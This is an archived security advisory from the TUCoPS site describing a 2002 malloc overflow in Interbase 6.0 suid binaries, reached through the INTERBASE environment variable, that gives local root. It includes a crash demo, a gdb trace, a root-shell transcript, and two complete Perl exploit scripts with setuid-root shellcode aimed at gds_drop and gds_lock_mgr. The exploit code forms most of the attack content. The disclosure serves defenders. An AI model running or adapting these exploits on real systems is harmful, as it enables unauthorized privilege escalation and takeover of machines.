Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix5468.htm

Interbase malloc() issues leading to local root



19th Jun 2002 [SBWID-5468]
COMMAND

	Interbase malloc() issues leading to local root

SYSTEMS AFFECTED

	 Interbase 6.0 shipped with mandrake 7.2

	 (interbase-6.0-1.i386.rpm or ib_source601.tar.gz)

PROBLEM

	In Strategic Reconnaissance Team Security Advisory  (SRT2002-06-17-1043)
	KF [http://www.snosoft.com] posted following:
	

	interbase-6.0-1.i386.rpm provided with Mandrake 7.2  contains  an  issue
	when reading the  enivornment  variable  \"INTERBASE\".  This  issue  is
	demonstrated below.
	

	

	[dotslash@ghetto dotslash]$ export INTERBASE=`perl -e \'print \"A\" x 500\'`

	[dotslash@ghetto dotslash]$ /usr/local/interbase/bin/gds_drop

	Segmentation fault

	

	

	This issue results in a malloc() overflow.
	 

	The following suid root binaries are potentially exploitable.
	

	

	/usr/local/interbase/bin/gds_drop

	/usr/local/interbase/bin/gds_inet_server

	/usr/local/interbase/bin/gds_lock_mgr 

	

	(gdb) r

	Starting program: /usr/local/interbase/bin/gds_drop

	

	Program received signal SIGSEGV, Segmentation fault.

	0x400a0832 in ptmalloc_init () at malloc.c:1696

	1696    malloc.c: No such file or directory.

	        in malloc.c

	(gdb) bt

	#0  0x400a0832 in ptmalloc_init () at malloc.c:1696

	#1  0x400a4e64 in malloc_hook_ini (sz=364, caller=0x40092571) at

	malloc.c:1856

	#2  0x400a0f8d in __libc_malloc (bytes=364) at malloc.c:2798

	#3  0x40092571 in _IO_new_fopen (

	    filename=0xbfffd65c \'A\' <repeats 200 times>..., mode=0x80583c0 \"r\")

	    at iofopen.c:50

	#4  0x0804a244 in ISC_get_config ()

	#5  0x41414141 in ?? ()

	Cannot access memory at address 0x41414141

	

	 

	

	 Impact

	 ======

	

	local root can be exploited.
	

	

	[dotslash@ghetto dotslash]$ id

	uid=501(dotslash) gid=1214(snosoft) groups=1214(snosoft),501(dotslash)

	[dotslash@ghetto dotslash]$ /etc/hackme/done/interbase_gds_drop_exploit

	sh-2.05# id

	uid=0(root) gid=1214(snosoft) groups=1214(snosoft),501(dotslash)

	

	

	

	

	 Exploits

	 ========

	

	 interbase_gds_drop.pl

	 ---------------------

	

	

	#!/usr/bin/perl -w

	#

	# gds_drop exploit for Interbase 6.0 linux beta

	#

	# - tested on redhat 7.2

	#

	# - Developed in the Snosoft Cerebrum test labs

	# - (http://www.snosoft.com) - overflow found by KF

	#

	# coded by stripey - 15/06/2002 (stripey@snosoft.com)

	#

	

	($offset) = @ARGV,$offset || ($offset = 0);

	

	$sc  = \"\\x90\"x512;

	$sc .= \"\\x31\\xd2\\x31\\xc9\\x31\\xdb\\x31\\xc0\\xb0\\xa4\\xcd\\x80\";

	$sc .= \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\";

	$sc .= \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\";

	$sc .= \"\\x80\\xe8\\xdc\\xff\\xff\\xff/bin/sh\";

	

	$ENV{\"FOO\"} = $sc;

	

	$buf  = pack(\"l\",(0xbffffdc0+$offset))x86;

	$buf .= \"A\";

	

	$ENV{\"INTERBASE\"} = $buf;

	

	exec(\"/usr/local/interbase/bin/gds_drop\");

	

	

	

	 interbase_gds_lock_mgr.pl

	 -------------------------

	

	

	#!/usr/bin/perl -w

	#

	# gds_lock_mgr exploit for Interbase 6.0 linux beta

	#

	# - tested on redhat 7.2

	#

	# - Developed in the Snosoft Cerebrum test labs

	# - (http://www.snosoft.com) - overflow found by KF

	#

	# Note: We cannot attach to an interactive shell so it

	#       will execute /tmp/sh instead...

	#

	# coded by stripey - 15/06/2002 (stripey@snosoft.com)

	#

	

	($offset) = @ARGV,$offset || ($offset = 0);

	

	$sc  = \"\\x90\"x512;

	$sc .= \"\\x31\\xd2\\x31\\xc9\\x31\\xdb\\x31\\xc0\\xb0\\xa4\\xcd\\x80\";

	$sc .= \"\\xeb\\x1f\\x5e\\x89\\x76\\x08\\x31\\xc0\\x88\\x46\\x07\\x89\\x46\\x0c\\xb0\\x0b\";

	$sc .= \"\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xdb\\x89\\xd8\\x40\\xcd\";

	$sc .= \"\\x80\\xe8\\xdc\\xff\\xff\\xff/tmp/sh\";

	

	$ENV{\"FOO\"} = $sc;

	

	$buf  = pack(\"l\",(0xbffffdc0+$offset))x86;

	$buf .= \"A\";

	

	$ENV{\"INTERBASE\"} = $buf;

	

	exec(\"/usr/local/interbase/bin/gds_lock_mgr\");

	

SOLUTION

	The source code contains numerous strcat() calls ...  it  was  difficult
	to tell which actually caused the problem.
	

	Borland.com was notified ... the status on a  fix  is  unknown.  Due  to
	lack of access to version 6.5 it is  unknown  if  current  versions  are
	affected.
	 

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH